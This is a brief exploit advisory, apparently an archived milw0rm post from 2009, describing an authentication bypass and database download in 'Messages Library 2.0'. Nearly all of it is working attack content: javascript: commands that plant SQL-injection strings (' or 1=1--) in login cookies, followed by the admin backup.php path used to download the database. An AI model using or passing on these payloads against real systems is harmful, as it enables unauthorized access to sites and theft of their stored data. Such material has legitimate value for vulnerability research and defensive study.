17 lines
No EOL
460 B
Text
17 lines
No EOL
460 B
Text
# Messages Library 2.0 <= Arbitrary Database Download Vulnerability
|
|
########################################
|
|
#[*] Founded & Exploited by : Stack
|
|
########################################
|
|
|
|
Bypass with
|
|
|
|
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
|
|
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
|
|
|
|
After Exec
|
|
|
|
http://localhost/sms/admin/backup.php
|
|
|
|
and you got the database download
|
|
|
|
# milw0rm.com [2009-07-01] |